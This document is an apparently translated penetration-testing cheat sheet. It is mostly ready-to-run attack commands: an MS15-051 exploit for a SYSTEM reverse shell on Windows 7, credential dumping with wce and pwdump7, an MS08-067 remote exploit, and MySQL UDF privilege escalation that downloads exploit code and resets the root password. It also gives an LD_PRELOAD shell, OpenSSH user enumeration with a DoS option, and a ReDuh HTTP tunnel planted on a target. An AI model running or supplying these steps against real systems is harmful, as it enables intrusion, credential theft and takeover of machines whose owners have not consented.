    Getting a SYSTEM-level reverse shell on Win7 as a normal user

    https://technet.microsoft.com/en-us/security/bulletin/dn602597.aspx #ms15-051

    https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html


    https://www.exploit-db.com/exploits/37049/

    # Check whether the target machine has the patch installed with the following commands
    wmic qfe get
    wmic qfe | find "3057191"

    # Upload the compiled exploit and run it

    https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe

    # By default it runs cmd.exe with system privileges, but we need to change the source code so that it runs the danger.exe we uploaded
    # download it from https://github.com/hfiref0x/CVE-2015-1701 and look at "main.c"

    # Get the plaintext credentials of logged-in users with wce.exe

    http://www.ampliasecurity.com/research/windows-credentials-editor/

    wce -w

    # Get the password hashes of other users with pwdump7

    http://www.heise.de/download/pwdump.html

    # we can try online hash cracking tools such as crackstation.net
    MS08-067 without Metasploit

    $ nmap -v -p 139,445 --script=smb-check-vulns --script-args=unsafe=1 192.168.31.205
    $ searchsploit ms08-067
    $ python /usr/share/exploitdb/platforms/windows/remote/7132.py 192.168.31.205 1
    Privilege escalation via the MySQL root account

    # Mysql Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu)
    $ wget 0xdeadbeef.info/exploits/raptor_udf2.c
    $ gcc -g -c raptor_udf2.c
    $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
    mysql -u root -p
    mysql> use mysql;
    mysql> create table foo(line blob);
    mysql> insert into foo values(load_file('/home/user/raptor_udf2.so'));
    mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
    mysql> create function do_system returns integer soname 'raptor_udf2.so';
    mysql> select * from mysql.func;
    mysql> select do_system('echo "root:passwd" | chpasswd > /tmp/out; chown user:user /tmp/out');

    user:~$ su -
    Password:
    user:~# whoami
    root
    root:~# id
    uid=0(root) gid=0(root) groups=0(root)
    Injecting into programs with LD_PRELOAD

    $ wget https://github.com/jivoi/pentest/ldpreload_shell.c
    $ gcc -shared -fPIC ldpreload_shell.c -o ldpreload_shell.so
    $ sudo -u user LD_PRELOAD=/tmp/ldpreload_shell.so /usr/local/bin/somesoft
    Enumeration timing attack against OpenSSH users

    Note: An enumeration timing attack is a kind of side-channel attack. A side-channel attack exploits information outside the channel itself, such as encryption/decryption speed, the voltage on chip pins during encryption/decryption, or the volume and path of ciphertext traffic; in a phrase, "attacking from the side". Adapted from shotgun's explanation on Zhihu.

    osueta is a python2 script for timing attacks against OpenSSH. It can enumerate OpenSSH user names via the timing attack and, under certain conditions, perform a DoS attack on the OpenSSH server.

    # https://github.com/c0r3dump3d/osueta
    $ ./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes
    $ ./osueta.py -H 192.168.10.22 -p 22 -d 15 -v yes --dos no -L userfile.txt
    Using ReDuh to build a TCP tunnel out of legitimate HTTP requests

    Note: ReDuh is a tool that tunnels arbitrary other traffic over HTTP. It can forward ports of an internal server to the local machine through an http/https tunnel, forming a connected loop, and is used to reach ports open inside the target server when it sits in an internal network or behind port filtering.

    By the way, ReDuh-Gui is reputed to be a port-forwarding marvel.

    # https://github.com/sensepost/reDuh

    # Step 1
    # Upload reDuh.jsp to the target server
    $ http://192.168.10.50/uploads/reDuh.jsp

    # Step 2
    # Run reDuhClient locally
    $ java -jar reDuhClient.jar http://192.168.10.50/uploads/reDuh.jsp

    # Step 3
    # Connect to the management port with nc
    $ nc -nvv 127.0.0.1 1010

    # Step 4
    # Forward a local port to the remote target port through the tunnel
    [createTunnel] 7777:172.16.0.4:3389

    # Step 5
    # Connect to the remote host over RDP
    $ /usr/bin/rdesktop -g 1024x768 -P -z -x l -k en-us -r sound:off localhost:7777